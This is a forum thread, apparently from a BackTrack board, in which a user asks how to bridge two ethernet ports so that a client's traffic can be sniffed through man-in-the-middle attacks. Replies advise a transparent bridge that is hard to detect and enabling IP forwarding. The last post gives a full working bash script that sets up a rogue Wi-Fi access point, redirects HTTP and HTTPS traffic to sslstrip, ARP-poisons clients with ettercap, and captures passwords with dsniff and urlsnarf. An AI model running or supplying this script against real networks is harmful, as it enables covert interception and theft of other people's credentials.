Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: Redirecting ALL traffic from one ethernet port to another

Hybrid View

  1. #1
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Redirecting ALL traffic from one ethernet port to another

    So the title says it all.
    My linux knowledge is still limited, and I would like to know how I can achieve this.
    Should I be using iptables to set this up? if so, could someone provide the commands?
    (redirecting all incoming/outgoing traffic from eth1 to eth2, and visa versa)

    Thanks,

    .L

  2. #2
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default Re: Redirecting ALL traffic from one ethernet port to another

    Quote Originally Posted by Lucifer View Post
    So the title says it all.
    My linux knowledge is still limited, and I would like to know how I can achieve this.
    Should I be using iptables to set this up? if so, could someone provide the commands?
    (redirecting all incoming/outgoing traffic from eth1 to eth2, and visa versa)

    Thanks,

    .L

    Are you looking to setup a bridge or a route?
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  3. #3
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Redirecting ALL traffic from one ethernet port to another

    Well I'm not sure how to call it.
    An ethernet device on my first port needs to be connected to the internet on my second port, and I'm looking to set up some mitm attacks between those two ports, so all the traffic from the ethernet client can be sniffed.

    thanks,

  4. #4
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default Re: Redirecting ALL traffic from one ethernet port to another

    If you're actually going to be wiring the device in to the middle like that then a transparent bridge would work fine, as then it cannot be detected by normal means on the network and you can then use the virtual bridge interface to monitor the traffic, and you don't have to mess around with routing.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  5. #5
    Member whitelisted's Avatar
    Join Date
    Feb 2010
    Posts
    72

    Default Re: Redirecting ALL traffic from one ethernet port to another

    sounds to me like you want to act as a router.

    This command will enable IP forwarding and have your machine act as a router:
    Code:
    echo 1 >/proc/sys/net/ipv4/ip_forward
    It's more complex than running just that command, though. You will need to make sure you have setup your routes correctly on both your victim machine and on your router. You haven't given me enough information to help you any further, and I suspect you're going to need to do a lot more reading.
    Last edited by whitelisted; 05-05-2010 at 11:32 PM.

  6. #6
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Redirecting ALL traffic from one ethernet port to another

    It surprises me that it's really that hard like you say.
    you could indeed say my linux box would be acting as a simple router between a client and the internet.
    I just need to figure out how I can route every single packet from eth1 to eth2, and from eth2 to eth1, depending on the source/destination ofcourse. I thought that would be easy to setup, but I can't figure out how to do it.

    EDIT: To streaker69, bridging the connections like you say might do the job. How would I need to configure it? I always figured there would be a quick and easy command to do so, or am I mistaken?
    Last edited by Lucifer; 05-06-2010 at 12:00 AM.

  7. #7
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default Re: Redirecting ALL traffic from one ethernet port to another

    Quote Originally Posted by Lucifer View Post
    EDIT: To streaker69, bridging the connections like you say might do the job. How would I need to configure it? I always figured there would be a quick and easy command to do so, or am I mistaken?
    I'd think that a quick google search for "bridge +linux" would probably find it quickly. That's how I found it when I did something similar.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  8. #8
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Redirecting ALL traffic from one ethernet port to another

    as a matter of fact, I'm doing that right now, and it seems like I should install "bridge-utils". Is this tool (or a similar one) included in backtrack?
    Last edited by Lucifer; 05-06-2010 at 12:23 AM.

  9. #9
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default Re: Redirecting ALL traffic from one ethernet port to another

    Just as another hint on this, you do not need to bind IP to either interface or your bridge to monitor it's traffic. If you want to stay completely silent on the LAN, you definitely do not want IP bound to these interfaces.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  10. #10
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Redirecting ALL traffic from one ethernet port to another

    I've pieced this script together to work on wifi, but you could easily tailor it to work on a wired connection. Let me know if you have any issues.

    Rogue AP + SSL MITM

    Code:
    #!/bin/bash
    LOGDIR="$(date +%F-%H%M)"
    mkdir $LOGDIR
    cd $LOGDIR
    killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail 
    
    echo 'Network Interfaces:'
    ifconfig | grep Link
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    airmon-ng
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    airmon-ng stop $WIFACE 
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    ifconfig $WIFACE up
    
    modprobe tun
    
    #airbase-ng is going to create our fake AP with the SSID we specified
    airbase-ng -e $ESSID -P -C 30 -v mon0  > airbase.log &
    xterm -bg black -fg yellow -T Airbase-NG -e tail -f airbase.log  &
    
    sleep 10
    
    echo Configuring interface created by airdrop-ng
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    
    echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    
    
    echo Creating a dhcpd.conf to assign addresses to clients that connect to us
    echo "default-lease-time 600;" > dhcpd.conf
    echo "max-lease-time 720;"  >> dhcpd.conf
    echo "ddns-update-style none;" >> dhcpd.conf
    echo "authoritative;"  >> dhcpd.conf
    echo "log-facility local7;"  >> dhcpd.conf
    echo "subnet 10.0.0.0 netmask 255.255.255.0 {"  >> dhcpd.conf
    echo "range 10.0.0.100 10.0.0.254;"  >> dhcpd.conf
    echo "option routers 10.0.0.1;"  >> dhcpd.conf
    echo "option domain-name-servers 8.8.8.8;"  >> dhcpd.conf
    echo "}"  >> dhcpd.conf
    
    echo 'DHCP server starting on our airdrop-ng interface (at0)'
    dhcpd3 -f -cf dhcpd.conf at0 &
    echo "Launching DMESG"
    xterm -bg black -fg red -T "System Logs" -e tail -f /var/log/messages &
    echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
    xterm -bg black -fg blue -e ettercap -T -q -p -l etterca.log -i at0 // // &
    sleep 8
    
    echo 'Configuring ip forwarding'
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo 'Launching various tools'
    sslstrip -a -k -f &
    driftnet -v -i at0 &
    xterm  -bg black -fg green -e urlsnarf  -i at0 &
    dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &
    tshark -i at0 -w traffic.pcap &
    
    echo 'Run "etterlog -p  etterca.log" to view sniffed passwords.'

Page 1 of 2 12 LastLast

Similar Threads

  1. mitm with etter cap redirecting to beef
    By crooks in forum OLD BackTrack 4 Software Related Issues
    Replies: 4
    Last Post: 10-24-2009, 05:28 AM
  2. 802.11p - traffic generator
    By TheMrOrange in forum OLD Newbie Area
    Replies: 9
    Last Post: 08-27-2009, 03:26 PM
  3. port scan to find systems without a certain port open?
    By humbleman in forum OLD Newbie Area
    Replies: 3
    Last Post: 07-30-2009, 04:14 PM
  4. Virtual Machine and Ethernet Port
    By J-Poo in forum OLD Latest Public Release - BackTrack4 Beta
    Replies: 2
    Last Post: 05-10-2009, 08:12 AM
  5. Arp poisoning / Redirecting to my own machine?
    By The Dan in forum OLD Specialist Topics
    Replies: 5
    Last Post: 01-08-2009, 11:19 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •